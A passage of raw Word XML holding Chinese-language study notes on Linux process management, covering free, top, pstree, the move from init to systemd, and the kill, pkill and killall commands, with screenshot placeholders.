    <w:p w14:paraId="0EA871AA" w14:textId="10202DE6" w:rsidR="00940394" w:rsidRDefault="00940394" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>free</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到空闲内存等情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3CCAFF" w14:textId="77777777" w:rsidR="00940394" w:rsidRDefault="00940394" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25FBF533" w14:textId="57537FC4" w:rsidR="00940394" w:rsidRDefault="00753AEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上看虚拟内存的设置和大小。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59577464" w14:textId="41DE2108" w:rsidR="003A0386" w:rsidRDefault="00753AEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01A5F478" wp14:editId="19A7B87D">
            <wp:extent cx="5274310" cy="3051810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="196949361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93616" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3051810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="574240CD" w14:textId="77777777" w:rsidR="003A0386" w:rsidRDefault="003A0386" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2104D465" w14:textId="37E10880" w:rsidR="003A0386" w:rsidRDefault="00F06BEB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令查看进程状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DFE024" w14:textId="0F5B8A59" w:rsidR="003A0386" w:rsidRDefault="005A3C25" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E110F54" w14:textId="66FE66D4" w:rsidR="005A3C25" w:rsidRDefault="0013595B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48BBCF06" wp14:editId="384D5B82">
            <wp:extent cx="5274310" cy="2515235"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="81687993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79931" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2515235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="583CD9C7" w14:textId="0BDE30B0" w:rsidR="003A0386" w:rsidRDefault="00411FAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65FE7A58" wp14:editId="7B84121B">
            <wp:extent cx="5274310" cy="2644775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="749236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36116" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2644775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F901F07" w14:textId="0D1EACFA" w:rsidR="00411FAD" w:rsidRDefault="007534BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CDEB8BA" wp14:editId="14126FB1">
            <wp:extent cx="5274310" cy="2248535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1783509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09470" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2248535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B89F59" w14:textId="77777777" w:rsidR="00411FAD" w:rsidRDefault="00411FAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="053035DC" w14:textId="0BEC0E24" w:rsidR="00F87E51" w:rsidRDefault="00F87E51" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pstree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看进程树</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3727C637" w14:textId="77777777" w:rsidR="00F87E51" w:rsidRPr="00F87E51" w:rsidRDefault="00F87E51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7611E78B" w14:textId="0878B4ED" w:rsidR="00411FAD" w:rsidRDefault="009B5552" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pstree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365FC6B6" w14:textId="3DB98552" w:rsidR="009B5552" w:rsidRPr="00F87E51" w:rsidRDefault="009C0D9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>会出现一个横着长的进程树</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E43324F" w14:textId="44892015" w:rsidR="007534BF" w:rsidRDefault="009C0D9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现实</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300A0B37" w14:textId="4BD59731" w:rsidR="007534BF" w:rsidRDefault="00E870B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pstree</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E9294" w14:textId="21582B27" w:rsidR="00E870B6" w:rsidRDefault="00E870B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67EB62DC" w14:textId="4F9085B3" w:rsidR="007534BF" w:rsidRDefault="00992D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426CD7F3" w14:textId="4F81C9DC" w:rsidR="00992D4F" w:rsidRDefault="00992D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; systemd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的变化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD40C0" w14:textId="7274D2D2" w:rsidR="00992D4F" w:rsidRDefault="00817A30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最开始是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fedora</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在处理系统启动进程的速度提高了两倍，随后其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发行版也实现了这种变化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDD0D50" w14:textId="77777777" w:rsidR="00817A30" w:rsidRDefault="00817A30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4085E792" w14:textId="7FC5022B" w:rsidR="00411FAD" w:rsidRDefault="003176EA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令给进程发信号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B66224C" w14:textId="6CD1F0A4" w:rsidR="00411FAD" w:rsidRDefault="000319D0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D09C308" wp14:editId="2D34BD22">
            <wp:extent cx="5274310" cy="2751455"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15452832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8321" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2751455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37640493" w14:textId="77777777" w:rsidR="00411FAD" w:rsidRDefault="00411FAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F7473D" w14:textId="2B2248BF" w:rsidR="006368DA" w:rsidRDefault="005A2A91" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D4D959C" wp14:editId="276DD9A4">
            <wp:extent cx="5274310" cy="2827655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="267612608"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12608" name="图片 1" descr="表格&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2827655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E4110D" w14:textId="77777777" w:rsidR="005774AF" w:rsidRDefault="005774AF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B5C975" w14:textId="77777777" w:rsidR="005774AF" w:rsidRDefault="005774AF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2C9913" w14:textId="04B8A37E" w:rsidR="005774AF" w:rsidRDefault="005774AF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>terminated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460B3B4C" w14:textId="16168AA8" w:rsidR="005774AF" w:rsidRDefault="005774AF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>killed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B23EAF8" w14:textId="77777777" w:rsidR="005774AF" w:rsidRDefault="005774AF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACC43AE" w14:textId="77777777" w:rsidR="005774AF" w:rsidRDefault="005774AF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E2934C" w14:textId="77777777" w:rsidR="005774AF" w:rsidRDefault="005774AF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CBC4193" w14:textId="66B27FF7" w:rsidR="006B6D85" w:rsidRDefault="005774AF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74D8AE41" wp14:editId="65C407F9">
            <wp:extent cx="3150394" cy="3386693"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="166982148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21487" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3152549" cy="3389010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B08DDB" w14:textId="78F83FBF" w:rsidR="006368DA" w:rsidRDefault="006368DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CF5483" w14:textId="0954E5CB" w:rsidR="00733142" w:rsidRDefault="00733142" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pk</w:t>
      </w:r>
      <w:r>
        <w:t>ill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6336531F" w14:textId="7E9C04CC" w:rsidR="00733142" w:rsidRDefault="00733142" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">kill -f </w:t>
      </w:r>
      <w:r w:rsidR="00492B8E">
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:r w:rsidR="00492B8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
      <w:r w:rsidR="00492B8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidR="00492B8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的所有进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71820F96" w14:textId="68F48EDA" w:rsidR="00492B8E" w:rsidRDefault="00492B8E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>s -ef | grep cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就会发现没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的进城了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA2FF8" w14:textId="5E092B9D" w:rsidR="006368DA" w:rsidRDefault="00733142" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20DB1B00" wp14:editId="2C1E03F5">
            <wp:extent cx="5274310" cy="3300095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1396328124" name="图片 1" descr="图形用户界面, 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28124" name="图片 1" descr="图形用户界面, 文本&#10;&#10;中度可信度描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3300095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="684CDD7B" w14:textId="0C96CB8A" w:rsidR="006368DA" w:rsidRDefault="004B7FCA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pkill</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -t tty4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E77A80" w14:textId="17CFC885" w:rsidR="004B7FCA" w:rsidRDefault="00FA50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tty</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登陆的用户会被踢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5AA11A" w14:textId="77777777" w:rsidR="004B7FCA" w:rsidRDefault="004B7FCA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D561F7B" w14:textId="5C0ADDC0" w:rsidR="002C5F55" w:rsidRDefault="002C5F55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>killall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>干不掉的进程，就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FB247B" w14:textId="3352BD2D" w:rsidR="006368DA" w:rsidRDefault="00751ED3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>killal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">l </w:t>
      </w:r>
      <w:r w:rsidR="002C5F55">
        <w:t xml:space="preserve">-9 </w:t>
      </w:r>
      <w:r w:rsidR="002C5F55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程名字</w:t>
      </w:r>
      <w:r w:rsidR="002C5F55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C5F55">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="002C5F55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来干掉</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD7CA8A" w14:textId="06CA9BA1" w:rsidR="006368DA" w:rsidRDefault="00877EE0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
